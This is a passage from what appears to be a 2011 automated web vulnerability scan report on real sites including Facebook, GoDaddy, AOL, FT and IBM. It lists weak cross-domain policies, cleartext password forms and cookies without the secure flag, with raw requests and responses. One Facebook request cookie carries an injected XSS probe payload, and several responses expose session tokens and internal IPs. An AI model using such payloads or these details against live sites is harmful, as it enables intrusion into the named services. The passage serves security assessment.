   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

3.15. http://www.ft.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ft.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ft.com

Response

HTTP/1.1 200 OK
ETag: "51d-4ba8ec18"
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa CONo OUR DELi BUS IND PHY ONL UNI COM NAV INT DEM PRE OTC"
Accept-Ranges: bytes
Content-Length: 1309
Date: Thu, 05 May 2011 10:57:11 GMT
Connection: close
Last-Modified: Tue, 23 Mar 2010 16:28:08 GMT
Server: Apache/1.3.37
Content-Type: text/xml
Keep-Alive: timeout=1, max=120

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.ft.com" secure="true"/>
<allow-access-from domain="*.doubleclick.net" secure="true"/>
<allow-access-from domain="*.2mdn.net" secure="true"/>
<allow-access-from domain="*.dartmotif.net" secure="true"/>
<allow-access-from domain="*.tangozebra.com" secure="true"/>
<allow-access-from domain="*.euronews.net" secure="true"/>
<allow-access-from domain="*.google.com" secure="true"/>
<allow-access-from domain="*.gstatic.com" secure="true"/>
<allow-access-from domain="*.doubleclick.net" secure="false"/>
<allow-access-from domain="*.2mdn.net" secure="false"/>
<allow-access-from domain="*.dartmotif.net" secure="false"/>
<allow-access-from domain="*.doubleclick.net" secure="true"/>
<allow-access-from domain="*.doubleclick.com" secure="true"/>
<allow-access-from domain="*.doubleclick.com" secure="false"/>
<allow-access-from domain="*.2mdn.net" secure="true"/>
<allow-access-from domain="*.dartmotif.net" secure="true"/>
<allow-access-from domain="*.googlesyndication.com" secure="true"/>
<allow-access-from domain="*.brightcove.com" secure="true"/>
<allow-access-from domain="*.google-analytics.com" secure="true"/>
...[SNIP]...

3.16. https://www.godaddy.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.godaddy.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.godaddy.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:19 GMT
Connection: close
Content-Length: 150

<?xml version="1.0"?><cross-domain-policy><allow-access-from domain="*.wsimg.com" /><allow-access-from domain="*.godaddy.com" /></cross-domain-policy>

3.17. http://www.ibm.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ibm.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ibm.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:38 GMT
Server: IBM_HTTP_Server
Last-Modified: Sat, 01 Nov 2008 20:30:18 GMT
ETag: "153-95044a80"
Accept-Ranges: bytes
Content-Length: 339
epKe-Alive: timeout=10, max=8
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- $Id: crossdomain.xml,v 1.3 2008/08/08 15:47:24 krusch Ex
...[SNIP]...
<allow-access-from domain="*.ibm.com" />
<allow-access-from domain="*.lotus.com" />
...[SNIP]...

3.18. http://www.marketwatch.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.marketwatch.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.marketwatch.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 04 Nov 2010 12:22:38 GMT
Accept-Ranges: bytes
ETag: "07be2f71a7ccb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-MACHINE: sbkdedtwebp04
Date: Thu, 05 May 2011 10:58:41 GMT
Connection: keep-alive
Content-Length: 1625

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master
...[SNIP]...
<allow-access-from domain="*.marketwatch.com" />
<allow-access-from domain="*.mktw.net" />
<allow-access-from domain="creatives.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="motifcdn.doubleclick.net"/>
<allow-access-from domain="m.doubleclick.net"/>
<allow-access-from domain="m2.doubleclick.net"/>
<allow-access-from domain="m3.doubleclick.net"/>
<allow-access-from domain="m.2mdn.net"/>
<allow-access-from domain="m2.2mdn.net"/>
<allow-access-from domain="betadfa.doubleclick.net"/>
<allow-access-from domain="dfa.doubleclick.net"/>
<allow-access-from domain="motifcdn2.doubleclick.net"/>
<allow-access-from domain="ad.doubleclick.net"/>
<allow-access-from domain="m1.2mdn.net"/>
<allow-access-from domain="*.doubleclick.net"/>
<allow-access-from domain="*.2mdn.net"/>
<allow-access-from domain="*.wsj.com"/>
<allow-access-from domain="*.allthingsd.com"/>
<allow-access-from domain="*.barrons.com"/>
<allow-access-from domain="*.wsj.net"/>
<allow-access-from domain="*.dowjones.net"/>
<allow-access-from domain="*.llnwd.net"/>
<allow-access-from domain="*.wsj.com"/>
<allow-access-from domain="*.wsjradio.com"/>
<allow-access-from domain="*.barrons.com"/>
<allow-access-from domain="aes.online.edit.dowjones.net"/>
<allow-access-from domain="api.bizographics.com"/>
...[SNIP]...

3.19. http://www.mmafighting.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.mmafighting.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mmafighting.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:18 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 1400
Keep-Alive: timeout=5, max=999791
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy><allow-access-from domain="*.aol.com"/><allow-access-from domain="*.digitalcity.com"/><allow-access-from domain="*.aolcdn.com"/><allow-access-from domain="cdn-startpage.aol.com"/><allow-access-from domain="startpage.aol.com"/><allow-access-from domain="*.channels.aol.com"/><allow-access-from domain="*.channel.aol.com"/><allow-access-from domain="*.web.aol.com"/><allow-access-from domain="*.my.aol.com"/><allow-access-from domain="*.news.aol.com"/><allow-access-from domain="iamalpha.com"/><allow-access-from domain="imakealpha.com"/><allow-access-from domain="aimcreate.mdat.aim.com:30100 "/><allow-access-from domain="*.spinner.com"/><allow-access-from domain="*.popeater.com"/><allow-access-from domain="*.theboombox.com"/><allow-access-from domain="*.opticalcortex.com"/><allow-access-from domain="static.stats.com"/><allow-access-from domain="*.moviefone.com"/><allow-access-from domain="*.aolhealth.com"/><allow-access-from domain="*.walletpop.com"/><allow-access-from domain="*.stats.com"/><allow-access-from domain="*.lightningcast.com"/><allow-access-from domain="*.yourminis.com"/><allow-access-from domain="*.fanhouse.com"/><allow-access-from domain="*.blogsmithmedia.com"/><allow-access-from domain="*.beta.fanhouse.com"/>
...[SNIP]...

3.20. http://www.moviefone.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.moviefone.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.moviefone.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:49 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 317
Keep-Alive: timeout=5, max=999987
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.blogsmithmedia.com" />
<allow-access-from domain="*.aolcdn.com" />
...[SNIP]...

3.21. http://www.netvibes.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.netvibes.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.netvibes.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 05 May 2011 10:58:52 GMT
Content-Type: text/xml
Connection: close
X-Men: 52
Accept-Ranges: bytes
Last-Modified: Wed, 27 May 2009 07:32:50 GMT
Content-Length: 211
X-slb: 1
X-Jobs: http://about.netvibes.com/jobs.php looking for a sysadmin :)

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.meebo.com" />
</cross-dom
...[SNIP]...

3.22. http://www.pageflakes.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.pageflakes.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.pageflakes.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2592000
Content-Length: 266
Content-Type: text/xml
Last-Modified: Sat, 30 Aug 2008 02:30:03 GMT
Accept-Ranges: bytes
ETag: "462324f48ac91:430e2"
Server: Microsoft-IIS/6.0
From: web10
Date: Thu, 05 May 2011 10:58:53 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.pageflakes.com"/>
<allow-access-from domain="*.livevideo.com"/>
<allow-access-from domain="*.meandmypage.com"/>
<allow-access-from domain="*.solesite.com"/>
...[SNIP]...

3.23. http://www.popeater.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.popeater.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.popeater.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:54 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 317
Keep-Alive: timeout=5, max=999984
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.blogsmithmedia.com" />
<allow-access-from domain="*.aolcdn.com" />
...[SNIP]...

3.24. http://www.realtytrac.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.realtytrac.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.realtytrac.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Expires: Fri, 09 Oct 2020 00:00:00 GMT
Last-Modified: Fri, 21 May 2010 19:20:10 GMT
Accept-Ranges: bytes
ETag: "011ea11af9ca1:0"
Server: Microsoft-IIS/7.5
P3P: policyref="/w3c/p3p.xml",CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Thu, 05 May 2011 01:00:22 GMT
Connection: close
Content-Length: 170

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.realtytrac.com" />
<allow-access-from domain="*.erealinvestor.com" />
</cross-domain-policy>

3.25. http://www.tuaw.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.tuaw.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tuaw.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 13:06:15 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 269
Keep-Alive: timeout=5, max=1000000
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.blogsmithmedia.com" />
...[SNIP]...

3.26. http://www.truveo.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.truveo.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.truveo.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:01 GMT
Server: Apache
Last-Modified: Wed, 04 May 2011 21:11:01 GMT
Accept-Ranges: bytes
Content-Length: 100
Access-Control-Allow-Oritin: *
Keep-Alive: timeout=15, max=93
Connection: Keep-Alive
Content-Type: text/xml

<cross-domain-policy>
<allow-access-from domain="admin.brightcove.com" />
</cross-domain-policy>

4. Silverlight cross-domain policy previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.aol.com
Path:	/clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:22 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 314
Keep-Alive: timeout=5, max=56
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

5. Cleartext submission of password previous next
There are 4 instances of this issue:

http://www.facebook.com/
http://www.facebook.com/r.php
http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/
http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

5.1. http://www.facebook.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.facebook.com/

The form contains the following password field:

reg_passwd__

Request

GET / HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.181.69
Connection: close
Date: Thu, 05 May 2011 11:43:08 GMT
Content-Length: 30906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="reg_box"><form method="post" id="reg" name="reg" onsubmit="return function(event){return false;}.call(this,event)!==false && Event.__inlineSubmit(this,event)"><input type="hidden" autocomplete="off" name="post_form_id" value="76bac92d00ddc3f918cce3ae87a1177e" />
...[SNIP]...
<div class="field_container"><input type="password" class="inputtext" id="reg_passwd__" name="reg_passwd__" value="" /></div>
...[SNIP]...

5.2. http://www.facebook.com/r.php previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/r.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.facebook.com/r.php

The form contains the following password field:

reg_passwd__

Request

GET /r.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.252.126
Connection: close
Date: Thu, 05 May 2011 10:56:46 GMT
Content-Length: 29390

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="reg_box"><form method="post" id="reg" name="reg" onsubmit="return function(event){return false;}.call(this,event)!==false && Event.__inlineSubmit(this,event)"><input type="hidden" autocomplete="off" name="post_form_id" value="76bac92d00ddc3f918cce3ae87a1177e" />
...[SNIP]...
<div class="field_container"><input type="password" class="inputtext" id="reg_passwd__" name="reg_passwd__" value="" /></div>
...[SNIP]...

5.3. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mmafighting.com
Path:	/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

The form contains the following password field:

AuthorPassword

Request

GET /2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/ HTTP/1.1
Host: www.mmafighting.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comment_by_existing=deleted;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:41 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 10:58:41 GMT; path=/
Keep-Alive: timeout=5, max=999999
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 85678

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
</h3>

<form action="#comments" id="commentform" name="commentform" method="post" onsubmit="return inputValidation();">
<div id="cmttabs">
...[SNIP]...
<br />
<input id="C_AuthorPass" type="password" class="formtext" name="AuthorPassword" value=""/></label>
...[SNIP]...

5.4. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mmafighting.com
Path:	/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545

The form contains the following password field:

AuthorPassword

Request

GET /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545 HTTP/1.1
Host: www.mmafighting.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:18 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 01:57:18 GMT; path=/
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 00:57:17 GMT; path=/
Content-Type: text/html
Content-Length: 63415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
</h3>

<form action="#comments" id="commentform" name="commentform" method="post" onsubmit="return inputValidation();">
<div id="cmttabs">
...[SNIP]...
<br />
<input id="C_AuthorPass" type="password" class="formtext" name="AuthorPassword" value=""/></label>
...[SNIP]...

6. SSL cookie without secure flag set previous next
There are 17 instances of this issue:

https://www.fightmagazine.com/mma-magazine/subscribe.asp
https://www.godaddy.com/
https://www.godaddy.com/domains/search.aspx
https://www.facebook.com/
https://www.facebook.com/ajax/intl/language_dialog.php
https://www.facebook.com/h02332
https://www.facebook.com/h02332
https://www.facebook.com/h02332
https://www.facebook.com/help/contact.php
https://www.facebook.com/login.php
https://www.facebook.com/pages/ToP-SeCNeT/195242630519520
https://www.facebook.com/pages/create.php
https://www.facebook.com/r.php
https://www.facebook.com/recover.php
https://www.godaddy.com/gdshop/hosting/landing.asp
https://www.godaddy.com/gdshop/registrar/search.asp
https://www.godaddy.com/gdshop/website.asp

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

6.1. https://www.fightmagazine.com/mma-magazine/subscribe.asp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.fightmagazine.com
Path:	/mma-magazine/subscribe.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ASPSESSIONIDCSSSACAT=OHOCLKNAGCJNELEGAPIKBNJM; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mma-magazine/subscribe.asp HTTP/1.1
Host: www.fightmagazine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:57:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 16739
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCSSSACAT=OHOCLKNAGCJNELEGAPIKBNJM; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="verify-v1" c
...[SNIP]...

6.2. https://www.godaddy.com/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.godaddy.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

ASP.NET_SessionId=2ot03x55n2cjbhmswxqzgtjx; path=/; HttpOnly
flag1=cflag=us; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:18 GMT; path=/
currency1=potableSourceStr=USD; domain=godaddy.com; expires=Fri, 04-May-2012 10:57:18 GMT; path=/
currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:18 GMT; path=/
traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB174&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=&referringdomain=&split=60; domain=godaddy.com; path=/
HPBackground=DanicaImageOne; path=/
HPBackground=DanicaImageOne; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=2ot03x55n2cjbhmswxqzgtjx; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:18 GMT; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Fri, 04-May-2012 10:57:18 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:18 GMT; path=/
Set-Cookie: SplitValue1=60; domain=godaddy.com; expires=Fri, 06-May-2011 10:57:18 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB174&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=&referringdomain=&split=60; domain=godaddy.com; path=/
Set-Cookie: HPBackground=DanicaImageOne; path=/
Set-Cookie: HPBackground=DanicaImageOne; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:18 GMT
Connection: close
Content-Length: 267405

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

